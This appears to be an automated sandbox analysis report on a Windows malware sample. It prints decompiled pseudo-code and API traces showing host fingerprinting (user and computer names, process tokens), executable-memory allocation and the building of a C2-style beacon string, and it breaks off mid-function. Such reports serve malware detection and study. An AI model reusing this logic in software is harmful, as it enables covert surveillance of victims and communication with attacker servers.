                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6E37DA28), ref: 6E37E097
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E37DA88), ref: 6E37E0CE
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E37E12E
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E164
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00000000,00000004,6E37DFB9), ref: 6E37E269
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00001000,00000004,6E37DFB9), ref: 6E37E290
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9), ref: 6E37E35D
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9,?), ref: 6E37E3B3
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E3CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187584430.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2574235972-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E04CDA82B(char __eax, void* __esi) {
                                                                                                                          				long _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v28;
                                                                                                                          				long _t34;
                                                                                                                          				signed int _t39;
                                                                                                                          				long _t50;
                                                                                                                          				char _t59;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				void* _t62;
                                                                                                                          				void* _t64;
                                                                                                                          				char _t65;
                                                                                                                          				intOrPtr* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t69;
                                                                                                                          
                                                                                                                          				_t69 = __esi;
                                                                                                                          				_t65 = __eax;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v12 = __eax;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					_t59 =  *0x4cdd2a8; // 0xd448b889
                                                                                                                          					_v12 = _t59;
                                                                                                                          				}
                                                                                                                          				_t64 = _t69;
                                                                                                                          				E04CD60B6( &_v12, _t64);
                                                                                                                          				if(_t65 != 0) {
                                                                                                                          					 *_t69 =  *_t69 ^  *0x4cdd2dc ^ 0x46d76429;
                                                                                                                          				} else {
                                                                                                                          					GetUserNameW(0,  &_v8); // executed
                                                                                                                          					_t50 = _v8;
                                                                                                                          					if(_t50 != 0) {
                                                                                                                          						_t62 = RtlAllocateHeap( *0x4cdd270, 0, _t50 + _t50);
                                                                                                                          						if(_t62 != 0) {
                                                                                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                          								_t64 = _t62;
                                                                                                                          								 *_t69 =  *_t69 ^ E04CD789B(_v8 + _v8, _t64);
                                                                                                                          							}
                                                                                                                          							HeapFree( *0x4cdd270, 0, _t62);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t61 = __imp__;
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				GetComputerNameW(0,  &_v8);
                                                                                                                          				_t34 = _v8;
                                                                                                                          				if(_t34 != 0) {
                                                                                                                          					_t68 = RtlAllocateHeap( *0x4cdd270, 0, _t34 + _t34);
                                                                                                                          					if(_t68 != 0) {
                                                                                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                          							_t64 = _t68;
                                                                                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04CD789B(_v8 + _v8, _t64);
                                                                                                                          						}
                                                                                                                          						HeapFree( *0x4cdd270, 0, _t68);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				asm("cpuid");
                                                                                                                          				_t67 =  &_v28;
                                                                                                                          				 *_t67 = 1;
                                                                                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                          				 *(_t67 + 0xc) = _t64;
                                                                                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                          				return _t39;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04CDA862
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04CDA879
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04CDA886
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04CD538B), ref: 04CDA8A7
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04CDA8CE
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04CDA8E2
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04CDA8EF
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04CD538B), ref: 04CDA90D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3239747167-0
                                                                                                                          • Opcode ID: 23c8787f9315a118254730846ceac51263fae4518af283a067cf12ab673e6251
                                                                                                                          • Instruction ID: 45581c27e7886dc4949da03011d4e3bee4eafb4ff9430ad33c029ec364f88a61
                                                                                                                          • Opcode Fuzzy Hash: 23c8787f9315a118254730846ceac51263fae4518af283a067cf12ab673e6251
                                                                                                                          • Instruction Fuzzy Hash: B231DA75A41205EFEB20DFA9DD81B7EB7FAFB48300B11446AE505D3210E735EE059B51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 38%
                                                                                                                          			E04CD5D10(char _a4, void* _a8) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				char _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				char _v32;
                                                                                                                          				char _v36;
                                                                                                                          				char _v40;
                                                                                                                          				void* _v44;
                                                                                                                          				void** _t33;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t43;
                                                                                                                          				void** _t44;
                                                                                                                          				intOrPtr* _t47;
                                                                                                                          				char _t48;
                                                                                                                          
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v20 = _a4;
                                                                                                                          				_t48 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_a4 = 0;
                                                                                                                          				_v44 = 0x18;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v24 = 0;
                                                                                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                          					_t33 =  &_v8;
                                                                                                                          					__imp__(_v12, 8, _t33);
                                                                                                                          					if(_t33 >= 0) {
                                                                                                                          						_t47 = __imp__;
                                                                                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                          						_t44 = E04CD75F6(_a4);
                                                                                                                          						if(_t44 != 0) {
                                                                                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                          							if(_t40 >= 0) {
                                                                                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                          								_t48 = 1;
                                                                                                                          							}
                                                                                                                          							E04CD4AAB(_t44);
                                                                                                                          						}
                                                                                                                          						NtClose(_v8); // executed
                                                                                                                          					}
                                                                                                                          					NtClose(_v12);
                                                                                                                          				}
                                                                                                                          				return _t48;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04CD5D57
                                                                                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04CD5D6A
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04CD5D86
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04CD5DA3
                                                                                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04CD5DB0
                                                                                                                          • NtClose.NTDLL(?), ref: 04CD5DC2
                                                                                                                          • NtClose.NTDLL(00000000), ref: 04CD5DCC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2575439697-0
                                                                                                                          • Opcode ID: 1c3dfc327eb82d45eedf5905950efa97d6127f10a0be6536e090330ac2574b07
                                                                                                                          • Instruction ID: 16b42c5753e69a0df7e4cef208741adab24c4dd77046a74cd35dbd13cf5968ec
                                                                                                                          • Opcode Fuzzy Hash: 1c3dfc327eb82d45eedf5905950efa97d6127f10a0be6536e090330ac2574b07
                                                                                                                          • Instruction Fuzzy Hash: 7521E67A901228BBDB01DF95CD45EDEBFBEEF48750F104026FA05E6110D7719A44DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E2E5696
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37B7A0,000008BB), ref: 6E2E576F
                                                                                                                            • Part of subcall function 6E2E72B0: task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EBA20: swap.LIBCPMTD ref: 6E2EBA39
                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E367144,?,?,?,?,?,00000000), ref: 6E2E5950
                                                                                                                          • std::locale::locale.LIBCPMTD ref: 6E2E59D8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                          • String ID: ?
                                                                                                                          • API String ID: 756721536-1684325040
                                                                                                                          • Opcode ID: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction ID: 09b3f38f99fddfd30bda2fb762b5b80dca631554444c509bd5469c0b50b8b9ad
                                                                                                                          • Opcode Fuzzy Hash: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction Fuzzy Hash: 295293B0900538CFCF08CFA8D990BAD77BAFB8A305F6089A9D54597794D738D849DB48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E04CD44A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void* _v44;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				void* __edi;
                                                                                                                          				long _t25;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				intOrPtr _t28;
                                                                                                                          				intOrPtr _t29;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				void* _t33;
                                                                                                                          				intOrPtr _t34;
                                                                                                                          				int _t37;
                                                                                                                          				void* _t38;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				intOrPtr _t43;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t50;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				intOrPtr* _t56;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				intOrPtr _t74;
                                                                                                                          				int _t77;
                                                                                                                          				intOrPtr _t78;
                                                                                                                          				int _t81;
                                                                                                                          				intOrPtr _t83;
                                                                                                                          				int _t86;
                                                                                                                          				intOrPtr* _t89;
                                                                                                                          				intOrPtr* _t90;
                                                                                                                          				void* _t91;
                                                                                                                          				void* _t95;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t97;
                                                                                                                          				intOrPtr _t98;
                                                                                                                          				void* _t100;
                                                                                                                          				int _t101;
                                                                                                                          				void* _t102;
                                                                                                                          				void* _t103;
                                                                                                                          				void* _t105;
                                                                                                                          				void* _t106;
                                                                                                                          				void* _t108;
                                                                                                                          
                                                                                                                          				_t95 = __edx;
                                                                                                                          				_t91 = __ecx;
                                                                                                                          				_t25 = __eax;
                                                                                                                          				_t105 = _a16;
                                                                                                                          				_v4 = 8;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					_t25 = GetTickCount();
                                                                                                                          				}
                                                                                                                          				_t26 =  *0x4cdd018; // 0x14d7c998
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t27 =  *0x4cdd014; // 0x3a87c8cd
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t28 =  *0x4cdd010; // 0xd8d2f808
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t29 =  *0x4cdd00c; // 0x81762942
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t30 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t3 = _t30 + 0x4cde633; // 0x74666f73
                                                                                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x4cdd02c,  *0x4cdd004, _t25);
                                                                                                                          				_t33 = E04CD5B60();
                                                                                                                          				_t34 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t4 = _t34 + 0x4cde673; // 0x74707526
                                                                                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                          				_t108 = _t106 + 0x38;
                                                                                                                          				_t102 = _t101 + _t37; // executed
                                                                                                                          				_t38 = E04CD1BBF(_t91); // executed
                                                                                                                          				_t96 = _t38;
                                                                                                                          				if(_t96 != 0) {
                                                                                                                          					_t83 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t6 = _t83 + 0x4cde8cc; // 0x736e6426
                                                                                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                          					_t108 = _t108 + 0xc;
                                                                                                                          					_t102 = _t102 + _t86;
                                                                                                                          					HeapFree( *0x4cdd270, 0, _t96);
                                                                                                                          				}
                                                                                                                          				_t97 = E04CD137A();
                                                                                                                          				if(_t97 != 0) {
                                                                                                                          					_t78 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t8 = _t78 + 0x4cde8d4; // 0x6f687726
                                                                                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                          					_t108 = _t108 + 0xc;
                                                                                                                          					_t102 = _t102 + _t81;
                                                                                                                          					HeapFree( *0x4cdd270, 0, _t97);
                                                                                                                          				}
                                                                                                                          				_t98 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				_a32 = E04CD3857(0x4cdd00a, _t98 + 4);
                                                                                                                          				_t42 =  *0x4cdd308; // 0x0
                                                                                                                          				if(_t42 != 0) {
                                                                                                                          					_t74 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t11 = _t74 + 0x4cde8ae; // 0x3d736f26
                                                                                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                          					_t108 = _t108 + 0xc;
                                                                                                                          					_t102 = _t102 + _t77;
                                                                                                                          				}
                                                                                                                          				_t43 =  *0x4cdd304; // 0x0
                                                                                                                          				if(_t43 != 0) {
                                                                                                                          					_t71 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t13 = _t71 + 0x4cde885; // 0x3d706926
                                                                                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                          				}
                                                                                                                          				if(_a32 != 0) {
                                                                                                                          					_t46 = RtlAllocateHeap( *0x4cdd270, 0, 0x800); // executed
                                                                                                                          					_t100 = _t46;
                                                                                                                          					if(_t100 != 0) {
                                                                                                                          						E04CDA811(GetTickCount());
                                                                                                                          						_t50 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          						__imp__(_t50 + 0x40);
                                                                                                                          						asm("lock xadd [eax], ecx");
                                                                                                                          						_t54 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          						__imp__(_t54 + 0x40);
                                                                                                                          						_t56 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          						_t103 = E04CD1974(1, _t95, _t105,  *_t56);
                                                                                                                          						asm("lock xadd [eax], ecx");
                                                                                                                          						if(_t103 != 0) {
                                                                                                                          							StrTrimA(_t103, 0x4cdc2ac);
                                                                                                                          							_push(_t103);
                                                                                                                          							_t62 = E04CD38CA();
                                                                                                                          							_v16 = _t62;
                                                                                                                          							if(_t62 != 0) {
                                                                                                                          								_t89 = __imp__;
                                                                                                                          								 *_t89(_t103, _v0);
                                                                                                                          								 *_t89(_t100, _a4);
                                                                                                                          								_t90 = __imp__;
                                                                                                                          								 *_t90(_t100, _v28);
                                                                                                                          								 *_t90(_t100, _t103);
                                                                                                                          								_t68 = E04CD2A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                          								_v52 = _t68;
                                                                                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                          									E04CD47D5();
                                                                                                                          								}
                                                                                                                          								HeapFree( *0x4cdd270, 0, _v44);
                                                                                                                          							}
                                                                                                                          							HeapFree( *0x4cdd270, 0, _t103);
                                                                                                                          						}
                                                                                                                          						RtlFreeHeap( *0x4cdd270, 0, _t100); // executed
                                                                                                                          					}
                                                                                                                          					HeapFree( *0x4cdd270, 0, _a24);
                                                                                                                          				}
                                                                                                                          				RtlFreeHeap( *0x4cdd270, 0, _t105); // executed
                                                                                                                          				return _a4;
                                                                                                                          			}
                                                                                                                          0x04cd457a
                                                                                                                          0x04cd457c
                                                                                                                          0x04cd4588
                                                                                                                          0x04cd458a
                                                                                                                          0x04cd458a
                                                                                                                          0x04cd4590
                                                                                                                          0x04cd45a3
                                                                                                                          0x04cd45a7
                                                                                                                          0x04cd45ae
                                                                                                                          0x04cd45b1
                                                                                                                          0x04cd45b6
                                                                                                                          0x04cd45c1
                                                                                                                          0x04cd45c3
                                                                                                                          0x04cd45c6
                                                                                                                          0x04cd45c6
                                                                                                                          0x04cd45c8
                                                                                                                          0x04cd45cf
                                                                                                                          0x04cd45d2
                                                                                                                          0x04cd45d7
                                                                                                                          0x04cd45e1
                                                                                                                          0x04cd45e3
                                                                                                                          0x04cd45eb
                                                                                                                          0x04cd45fe
                                                                                                                          0x04cd4604
                                                                                                                          0x04cd4608
                                                                                                                          0x04cd4614
                                                                                                                          0x04cd4619
                                                                                                                          0x04cd4622
                                                                                                                          0x04cd4633
                                                                                                                          0x04cd4637
                                                                                                                          0x04cd4640
                                                                                                                          0x04cd4646
                                                                                                                          0x04cd4653
                                                                                                                          0x04cd4660
                                                                                                                          0x04cd4666
                                                                                                                          0x04cd4672
                                                                                                                          0x04cd4678
                                                                                                                          0x04cd4679
                                                                                                                          0x04cd467e
                                                                                                                          0x04cd4684
                                                                                                                          0x04cd468a
                                                                                                                          0x04cd4691
                                                                                                                          0x04cd4698
                                                                                                                          0x04cd469e
                                                                                                                          0x04cd46a5
                                                                                                                          0x04cd46a9
                                                                                                                          0x04cd46b4
                                                                                                                          0x04cd46b9
                                                                                                                          0x04cd46bf
                                                                                                                          0x04cd46c8
                                                                                                                          0x04cd46c8
                                                                                                                          0x04cd46d9
                                                                                                                          0x04cd46d9
                                                                                                                          0x04cd46e8
                                                                                                                          0x04cd46e8
                                                                                                                          0x04cd46f7
                                                                                                                          0x04cd46f7
                                                                                                                          0x04cd4709
                                                                                                                          0x04cd4709
                                                                                                                          0x04cd4718
                                                                                                                          0x04cd4729

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD44BB
                                                                                                                          • wsprintfA.USER32 ref: 04CD4508
                                                                                                                          • wsprintfA.USER32 ref: 04CD4525
                                                                                                                          • wsprintfA.USER32 ref: 04CD4548
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD4558
                                                                                                                          • wsprintfA.USER32 ref: 04CD457A
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD458A
                                                                                                                          • wsprintfA.USER32 ref: 04CD45C1
                                                                                                                          • wsprintfA.USER32 ref: 04CD45E1
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04CD45FE
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD460E
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD4622
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD4640
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?,058B95B0), ref: 04CD199F
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(?,?,?,04CD4653,?,058B95B0), ref: 04CD19A7
                                                                                                                            • Part of subcall function 04CD1974: strcpy.NTDLL ref: 04CD19BE
                                                                                                                            • Part of subcall function 04CD1974: lstrcat.KERNEL32(00000000,?), ref: 04CD19C9
                                                                                                                            • Part of subcall function 04CD1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD19E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,04CDC2AC,?,058B95B0), ref: 04CD4672
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(058B9B10,00000000,00000000,745EC740,04CD467E,00000000), ref: 04CD38DA
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(?), ref: 04CD38E2
                                                                                                                            • Part of subcall function 04CD38CA: lstrcpy.KERNEL32(00000000,058B9B10), ref: 04CD38F6
                                                                                                                            • Part of subcall function 04CD38CA: lstrcat.KERNEL32(00000000,?), ref: 04CD3901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04CD4691
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04CD4698
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04CD46A5
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04CD46A9
                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04CD46D9
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04CD46E8
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,058B95B0), ref: 04CD46F7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04CD4709
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04CD4718
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3963266935-0
                                                                                                                          • Opcode ID: 250e81b5ea89a80b45a462a87858a4c33384268357cb1f4b5f59d562492d0a24
                                                                                                                          • Instruction ID: cac5969aea438153701fd630f8002db8960bbdfb067de9c6357e5cc20cc81a9d
                                                                                                                          • Opcode Fuzzy Hash: 250e81b5ea89a80b45a462a87858a4c33384268357cb1f4b5f59d562492d0a24
                                                                                                                          • Instruction Fuzzy Hash: 7A619D79902201AFD721AF68EC48F663BB9FB48354F040525FA0AD7250DA3DFD06DB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E04CD5461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				struct %anon52 _v8;
                                                                                                                          				long _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				union _LARGE_INTEGER _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				void* _v44;
                                                                                                                          				void _v88;
                                                                                                                          				char _v92;
                                                                                                                          				struct %anon52 _t46;
                                                                                                                          				intOrPtr _t51;
                                                                                                                          				long _t53;
                                                                                                                          				void* _t54;
                                                                                                                          				struct %anon52 _t60;
                                                                                                                          				long _t64;
                                                                                                                          				signed int _t65;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t70;
                                                                                                                          				signed int _t71;
                                                                                                                          				intOrPtr _t73;
                                                                                                                          				intOrPtr _t76;
                                                                                                                          				void** _t78;
                                                                                                                          				void* _t80;
                                                                                                                          
                                                                                                                          				_t73 = __edx;
                                                                                                                          				_v92 = 0;
                                                                                                                          				memset( &_v88, 0, 0x2c);
                                                                                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                          				_v44 = _t46;
                                                                                                                          				if(_t46 == 0) {
                                                                                                                          					_v8.LowPart = GetLastError();
                                                                                                                          				} else {
                                                                                                                          					_push(0xffffffff);
                                                                                                                          					_push(0xff676980);
                                                                                                                          					_push(0);
                                                                                                                          					_push( *0x4cdd278);
                                                                                                                          					_v20 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					L04CDAED0();
                                                                                                                          					_v36.LowPart = _t46;
                                                                                                                          					_v32 = _t73;
                                                                                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                          					_t51 =  *0x4cdd2a4; // 0x2ec
                                                                                                                          					_v40 = _t51;
                                                                                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                          					_v8.LowPart = _t53;
                                                                                                                          					if(_t53 == 0) {
                                                                                                                          						if(_a8 != 0) {
                                                                                                                          							L4:
                                                                                                                          							 *0x4cdd284 = 5;
                                                                                                                          						} else {
                                                                                                                          							_t68 = E04CD502E(_t73); // executed
                                                                                                                          							if(_t68 != 0) {
                                                                                                                          								goto L4;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_v12 = 0;
                                                                                                                          						L6:
                                                                                                                          						if(_v12 == 1 && ( *0x4cdd298 & 0x00000001) == 0) {
                                                                                                                          							_v12 = 2;
                                                                                                                          						}
                                                                                                                          						_t71 = _v12;
                                                                                                                          						_t58 = _t71 << 4;
                                                                                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                          						_t72 = _t71 + 1;
                                                                                                                          						_v24 = _t71 + 1;
                                                                                                                          						_t60 = E04CD577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                          						_v8.LowPart = _t60;
                                                                                                                          						if(_t60 != 0) {
                                                                                                                          							goto L17;
                                                                                                                          						}
                                                                                                                          						_t65 = _v24;
                                                                                                                          						_v12 = _t65;
                                                                                                                          						_t90 = _t65 - 3;
                                                                                                                          						if(_t65 != 3) {
                                                                                                                          							goto L6;
                                                                                                                          						} else {
                                                                                                                          							_v8.LowPart = E04CD2107(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                          						}
                                                                                                                          						goto L12;
                                                                                                                          						L17:
                                                                                                                          						__eflags = _t60 - 0x10d2;
                                                                                                                          						if(_t60 != 0x10d2) {
                                                                                                                          							_push(0xffffffff);
                                                                                                                          							_push(0xff676980);
                                                                                                                          							_push(0);
                                                                                                                          							_push( *0x4cdd27c);
                                                                                                                          							goto L21;
                                                                                                                          						} else {
                                                                                                                          							__eflags =  *0x4cdd280; // 0x0
